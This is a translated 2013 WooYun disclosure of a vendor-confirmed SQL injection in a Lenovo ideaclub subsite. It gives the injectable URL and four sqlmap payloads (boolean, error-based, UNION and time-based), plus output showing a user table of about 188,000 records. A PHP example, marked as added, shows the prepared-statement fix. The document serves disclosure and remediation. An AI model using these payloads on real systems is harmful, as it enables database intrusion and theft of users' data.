
Vulnerability summary (24 followers)

Defect ID: wooyun-2013-035312

Title: Lenovo security issue 8: one SQL injection on a sub-site (188597 user records at risk of leakage)

Affected vendor: Lenovo

Author: VIP

Submitted: 2013-08-26 15:37

Fix date: 2013-10-10 15:37

Public disclosure: 2013-10-10 15:37

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org. For questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2013-08-26: Details reported to the vendor; awaiting vendor response
2013-08-27: Vendor confirmed; details disclosed to the vendor only
2013-09-06: Details disclosed to core white hats and experts in the relevant field
2013-09-16: Details disclosed to regular white hats
2013-09-26: Details disclosed to intern white hats
2013-10-10: Details disclosed to the public

Brief description:

Lenovo is finally handing out gifts today, so I got motivated to dig for bugs again, and dug up another injection!

Detailed description:

Injection point:

http://ideaclub.lenovo.com.cn/club/index.php?m=member&c=reg&f=getPlace&item_id=ae03462ce1fb11e29c5fc89cdcd8545b


The item_id parameter is injectable.
Lucky this time: the injection returns output!!!

Proof of vulnerability:

---
Place: GET
Parameter: item_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: m=member&c=reg&f=getPlace&item_id=ae03462ce1fb11e29c5fc89cdcd8545b' AND 5080=5080 AND 'HEIH'='HEIH

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: m=member&c=reg&f=getPlace&item_id=ae03462ce1fb11e29c5fc89cdcd8545b' AND (SELECT 8983 FROM(SELECT COUNT(*),CONCAT(0x7162737971,(SELECT (CASE WHEN (8983=8983) THEN 1 ELSE 0 END)),0x716f707271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'YRCb'='YRCb

Type: UNION query
Title: MySQL UNION query (NULL) - 10 columns
Payload: m=member&c=reg&f=getPlace&item_id=ae03462ce1fb11e29c5fc89cdcd8545b' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7162737971,0x48416f6e704e75495566,0x716f707271),NULL,NULL,NULL,NULL,NULL#

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: m=member&c=reg&f=getPlace&item_id=ae03462ce1fb11e29c5fc89cdcd8545b' AND SLEEP(5) AND 'hKGD'='hKGD
---


web application technology: Nginx
back-end DBMS: MySQL 5.0


345 tables

Database: ideaclub2
[345 tables]


188596 user records

[15:11:37] [INFO] the SQL query used returns 188597 entries

Fix recommendation:

Filter the input.
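As an added example (not code from the report or from the ideaclub site, whose source is not shown), a hardened PHP handler for the getPlace request: the item_id value is checked against its expected 32-character hex shape and bound as a PDO parameter instead of being concatenated into the SQL text, which is what the payloads above rely on. The table and column names, DSN and credentials are assumptions.

```php
<?php
// Added example, not the ideaclub application's own code.
// Hardened getPlace-style lookup: validate item_id, then bind it as a
// parameter so user input never becomes part of the SQL statement.
declare(strict_types=1);

final class PlaceRepository
{
    public function __construct(private PDO $pdo)
    {
        // Use server-side prepared statements (no client-side emulation)
        // and surface driver errors as exceptions instead of silent failures.
        $this->pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
        $this->pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    }

    /** item_id in the report is a 32-char lowercase hex string; accept nothing else. */
    public static function isValidItemId(string $id): bool
    {
        return preg_match('/\A[0-9a-f]{32}\z/', $id) === 1;
    }

    /** @return array<string,mixed>|null  Assumed table/column names. */
    public function getPlace(string $itemId): ?array
    {
        if (!self::isValidItemId($itemId)) {
            return null; // caller turns this into an HTTP 400
        }
        // Weak pattern this replaces (do not use):
        //   "SELECT ... FROM c_item_tbl WHERE item_id = '$itemId'"
        $stmt = $this->pdo->prepare(
            'SELECT item_id, place_name FROM c_item_tbl WHERE item_id = :id LIMIT 1'
        );
        $stmt->execute([':id' => $itemId]);
        $row = $stmt->fetch(PDO::FETCH_ASSOC);
        return $row === false ? null : $row;
    }
}

// Controller glue for m=member&c=reg&f=getPlace&item_id=...
$itemId = (string)($_GET['item_id'] ?? '');
if (!PlaceRepository::isValidItemId($itemId)) {
    http_response_code(400);
    exit('invalid item_id');
}
// DSN and credentials are placeholders (assumption).
$pdo = new PDO('mysql:host=127.0.0.1;dbname=ideaclub2;charset=utf8mb4', 'db_user', 'db_pass');
$repo = new PlaceRepository($pdo);
header('Content-Type: application/json');
echo json_encode($repo->getPlace($itemId));
```

The format check alone would have rejected every payload shown in the proof section, and the bound parameter removes the injection even for ids that pass validation.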

Copyright notice: please credit the source when reposting: VIP@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2013-08-27 13:54

Vendor reply:

Thank you for your contribution to Lenovo security! We will evaluate and fix the relevant vulnerability immediately.

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2013-08-26 15:40 | PgHook ( regular white hat | Rank:964 vulns:115 | ...........................................)

    Damn, you want to go work at Lenovo, don't you! Haha!

  2. 2013-08-26 15:45 | 淡漠天空 certified white hat ( intern white hat | Rank:1113 vulns:142 | M: selling GOV STATE NSA CIA NASA DHS Symant...)

    WooYun: Lenovo issue 1: getshell on an important intranet server leading to suspected leakage of all user data and internal top-secret information. Mine got moved to "minor vendor"? Never mind how the front end shows it, but it's gone from the homepage "latest confirmed" list too...

  3. 2013-08-26 15:46 | 疯狗 certified white hat ( intern white hat | Rank:44 vulns:2 | Having read every vulnerability under heaven, the heart is naturally free of code.)

    @淡漠天空 When did this one get through? Sorted it out for you.

  4. 2013-08-26 15:50 | 淡漠天空 certified white hat ( intern white hat | Rank:1113 vulns:142 | M: selling GOV STATE NSA CIA NASA DHS Symant...)

    @疯狗 tks, I took a casual look at Lenovo and then @'d Finger....

  5. 2013-08-26 17:02 | iiiiiiiii ( regular white hat | Rank:680 vulns:89 | )

    Lenovo has been really hot lately

  6. 2013-08-26 18:36 | 小痞子 ( regular white hat | Rank:106 vulns:21 | <xss>alert("a")</xss>¥&@&……dssKhwjcw...)

    Sigh, nothing more to say~~ off to mine coal